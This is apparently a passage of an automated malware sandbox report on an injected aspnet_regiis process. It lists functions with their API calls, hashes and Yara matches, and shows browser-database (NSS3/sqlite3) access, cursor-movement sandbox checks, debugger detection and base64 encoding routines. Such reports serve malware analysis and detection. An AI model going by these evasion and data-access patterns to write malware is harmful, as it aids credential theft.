                                                                                                                                                                              • API ID: File$lstrcpy$Find$CloseCreatelstrcat$AllocCopyDeleteFirstHandleLocalNextObjectReadSingleSizeSystemThreadTimeWaitlstrlen
                                                                                                                                                                              • String ID: \*.*
                                                                                                                                                                              • API String ID: 2055012574-1173974218
                                                                                                                                                                              • Opcode ID: f75a41bfe5a81f84a48f215f67516acde6c40f360ce203a4b4bdf1511fe213e9
                                                                                                                                                                              • Instruction ID: ac64bf79a03151ee310f01f71f388af556b4c8e5f9bb8e5cd07ea7eac21fd855
                                                                                                                                                                              • Opcode Fuzzy Hash: f75a41bfe5a81f84a48f215f67516acde6c40f360ce203a4b4bdf1511fe213e9
                                                                                                                                                                              • Instruction Fuzzy Hash: 1CE18231D802299BDF21EB24DE89ACDB776AF44325F4144E1A908B7160DF74AEC98F90
                                                                                                                                                                              Function 6CB1AEC0 Relevance: 13.7, APIs: 9, Instructions: 242COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,00000002,?,6CC3CF46,?,6CB0CDBD,?,6CC3BF31,?,?,?,?,?,?,?), ref: 6CB1B039
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6CC3CF46,?,6CB0CDBD,?,6CC3BF31), ref: 6CB1B090
                                                                                                                                                                              • sqlite3_free.NSS3(?,?,?,?,?,?,6CC3CF46,?,6CB0CDBD,?,6CC3BF31), ref: 6CB1B0A2
                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,6CC3CF46,?,6CB0CDBD,?,6CC3BF31,?,?,?,?,?,?,?,?,?), ref: 6CB1B100
                                                                                                                                                                              • sqlite3_free.NSS3(?,?,00000002,?,6CC3CF46,?,6CB0CDBD,?,6CC3BF31,?,?,?,?,?,?,?), ref: 6CB1B115
                                                                                                                                                                              • sqlite3_free.NSS3(?,?,?,?,?,?,6CC3CF46,?,6CB0CDBD,?,6CC3BF31), ref: 6CB1B12D
                                                                                                                                                                                • Part of subcall function 6CB09EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6CB1C6FD,?,?,?,?,6CB6F965,00000000), ref: 6CB09F0E
                                                                                                                                                                                • Part of subcall function 6CB09EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6CB6F965,00000000), ref: 6CB09F5D
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$sqlite3_free$EnterLeave$CloseHandle
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3155957115-0
                                                                                                                                                                              • Opcode ID: 9cafaadc78c06ed4038ac40a2c0c5443c6eeb536c62f26082dd5e0a676859197
                                                                                                                                                                              • Instruction ID: 20676d0d39dd156e085a8bbc231ef157ca1ee5f63a2ca2df352f861854a11b1b
                                                                                                                                                                              • Opcode Fuzzy Hash: 9cafaadc78c06ed4038ac40a2c0c5443c6eeb536c62f26082dd5e0a676859197
                                                                                                                                                                              • Instruction Fuzzy Hash: 6E91AEB1A082458FDB04DF65C884A6AB7B2FF45304F154A2DE416D7F50EB30F999CB52
                                                                                                                                                                              Function 02A0180D Relevance: 12.1, APIs: 8, Instructions: 68sleepthreadCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • OpenInputDesktop.USER32(00000000,00000001,80000000), ref: 02A01823
                                                                                                                                                                              • SetThreadDesktop.USER32(00000000), ref: 02A0182A
                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 02A0183A
                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 02A0184A
                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 02A01859
                                                                                                                                                                              • Sleep.KERNEL32(00002710), ref: 02A0186B
                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 02A01870
                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 02A0187F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CursorSleep$Desktop$InputOpenThread
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3283940658-0
                                                                                                                                                                              • Opcode ID: 93cdf03013d287f6c2fb64ee6d8a61b0ed970964a0dc769ef729efb24f6bd0f4
                                                                                                                                                                              • Instruction ID: 1e31eefe6dfff29cb0b2d6909f7453729f804d11f1f9bc70807ab0195929edd0
                                                                                                                                                                              • Opcode Fuzzy Hash: 93cdf03013d287f6c2fb64ee6d8a61b0ed970964a0dc769ef729efb24f6bd0f4
                                                                                                                                                                              • Instruction Fuzzy Hash: 6B11FC31E10209EBEB10DBE4EDC9AEEB7B9AB44355F540865E605A2080DF70DB49CB64
                                                                                                                                                                              Function 02A2B0CC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,02A2B735,?,02A284E6,?,000000BC,?), ref: 02A2B10B
                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,02A2B735,?,02A284E6,?,000000BC,?), ref: 02A2B134
                                                                                                                                                                              • GetACP.KERNEL32(?,?,02A2B735,?,02A284E6,?,000000BC,?), ref: 02A2B148
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                                              • String ID: ACP$OCP
                                                                                                                                                                              • API String ID: 2299586839-711371036
                                                                                                                                                                              • Opcode ID: 2ec5f2ef61cf53c72a4744dcb0fb304f60441644724da549fe38e3af8eee02eb
                                                                                                                                                                              • Instruction ID: 4f73e2f473876cdca10072ff00f9220b945bb4c1f7285e7c15272510f6ca6956
                                                                                                                                                                              • Opcode Fuzzy Hash: 2ec5f2ef61cf53c72a4744dcb0fb304f60441644724da549fe38e3af8eee02eb
                                                                                                                                                                              • Instruction Fuzzy Hash: C2018431A41636BBEB219B68EC86F5A77FDAB0476CF200814F501E50C0EF60DA4ED664
                                                                                                                                                                              Function 02A1D016 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 02A1D44E
                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 02A1D463
                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(02A3332C), ref: 02A1D46E
                                                                                                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 02A1D48A
                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 02A1D491
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2579439406-0
                                                                                                                                                                              • Opcode ID: 10ca55b14b7c470ff34684160ce3efaf22feea79132969a69f82dbcd200f3d14
                                                                                                                                                                              • Instruction ID: 4e66e552b6e74fe33fe3bcc4b306e37bce2e2406ee2e28ea7abd3a907d7a4c7c
                                                                                                                                                                              • Opcode Fuzzy Hash: 10ca55b14b7c470ff34684160ce3efaf22feea79132969a69f82dbcd200f3d14
                                                                                                                                                                              • Instruction Fuzzy Hash: C821CEB4C81B20DFD740DF64F588A4ABBA4BB08314F00891AE41987240EFB4D5ABCF56
                                                                                                                                                                              Function 02A11E5D Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,02C5E908,?,?,?,02A128A1,?,?,00000000), ref: 02A11E7D
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,?,02A128A1,?,?,00000000), ref: 02A11E8A
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A11E91
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Heap$AllocateBinaryCryptProcessString
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 869800140-0
                                                                                                                                                                              • Opcode ID: 74adb56baf4cc5913a5126f4a0f5bab2c264104fab21bcd32dddc991c049977c
                                                                                                                                                                              • Instruction ID: ef54b38e809c0792af0cd82ec044fbc844387c1ba71b2bae61b0e251ae1b457e
                                                                                                                                                                              • Opcode Fuzzy Hash: 74adb56baf4cc5913a5126f4a0f5bab2c264104fab21bcd32dddc991c049977c
                                                                                                                                                                              • Instruction Fuzzy Hash: D8011E70900218FFDF118FA1DC84AAB7BBAFF492A4B144958F50993150DB719AA1DF20
                                                                                                                                                                              Function 02A08048 Relevance: 6.0, APIs: 4, Instructions: 42encryptionmemoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • CryptStringToBinaryA.CRYPT32(02A06724,00000000,00000001,00000000,?,00000000,00000000), ref: 02A08060
                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?,?,?,02A06724,?), ref: 02A0806E
                                                                                                                                                                              • CryptStringToBinaryA.CRYPT32(02A06724,00000000,00000001,00000000,?,00000000,00000000), ref: 02A08084
                                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,02A06724,?), ref: 02A08093
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: BinaryCryptLocalString$AllocFree
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4291131564-0
                                                                                                                                                                              • Opcode ID: fdcd62311e392a15857cb7465cfba56417f69686962898417dc63b6a5011ebf3
                                                                                                                                                                              • Instruction ID: ae89c7a7186858081a719cc44edf959555470fcaf167aeebccb6b8e5a5383b2b
                                                                                                                                                                              • Opcode Fuzzy Hash: fdcd62311e392a15857cb7465cfba56417f69686962898417dc63b6a5011ebf3
                                                                                                                                                                              • Instruction Fuzzy Hash: 15F0EC70541334BFDB315F66DC9DF8B7FA8EF06BA0B100555F909E6240E7718A90DAA1
                                                                                                                                                                              Function 02A2B556 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • EnumSystemLocalesA.KERNEL32(Function_0002B1C1,00000001), ref: 02A2B56F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: EnumLocalesSystem
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2099609381-0
                                                                                                                                                                              • Opcode ID: f761dc6c6b542249e67d932148e23a16134f80844cab7abf59cd16d269bb93d9
                                                                                                                                                                              • Instruction ID: 748a5251aa89bc9eda664d9efadcee871a01ff8282b302a164d9429773701289
                                                                                                                                                                              • Opcode Fuzzy Hash: f761dc6c6b542249e67d932148e23a16134f80844cab7abf59cd16d269bb93d9
                                                                                                                                                                              • Instruction Fuzzy Hash: 0FD05E71A50710ABE7204F349D497A177A0FB10B1AF209C49DC9249080DBB4A1DE8611
                                                                                                                                                                              Function 6CB78EA0 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: e066d75b3ce7ebd9a284dd543d92249b9d3d32655331b9ef1484d327e257e1b7
                                                                                                                                                                              • Instruction ID: 99d594c28858db37b069705362ce553c135abed93b05895eeb1c8db5e184e9da
                                                                                                                                                                              • Opcode Fuzzy Hash: e066d75b3ce7ebd9a284dd543d92249b9d3d32655331b9ef1484d327e257e1b7
                                                                                                                                                                              • Instruction Fuzzy Hash: 86112732A002458FDB24DF15D88475AB7B6FF4231CF04466ADC259FA41C376E982C7E2
                                                                                                                                                                              Function 6CC50C40 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 2102b81f89a9ee679ba0fb72b700f8f4f385332b7460c3b13555640728c69955
                                                                                                                                                                              • Instruction ID: bab24eb5030dd3f74e1930d287cd6011440ae8da3319761ed8c3388fa17f36b2
                                                                                                                                                                              • Opcode Fuzzy Hash: 2102b81f89a9ee679ba0fb72b700f8f4f385332b7460c3b13555640728c69955
                                                                                                                                                                              • Instruction Fuzzy Hash: 8E11C174B043458FCB00DF19C8C066A7BB2FF86368F14806DD8198B701EB31E826CBA5
                                                                                                                                                                              Function 02A18599 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 35f880b7d9409492cfbd2c31b6ba08b67b52b83fed8c053745051b7244bb587c
                                                                                                                                                                              • Instruction ID: 81b03007a1f881deed44a42fc0175a6fbd256bce6d09bf2effb1e14420dd7128
                                                                                                                                                                              • Opcode Fuzzy Hash: 35f880b7d9409492cfbd2c31b6ba08b67b52b83fed8c053745051b7244bb587c
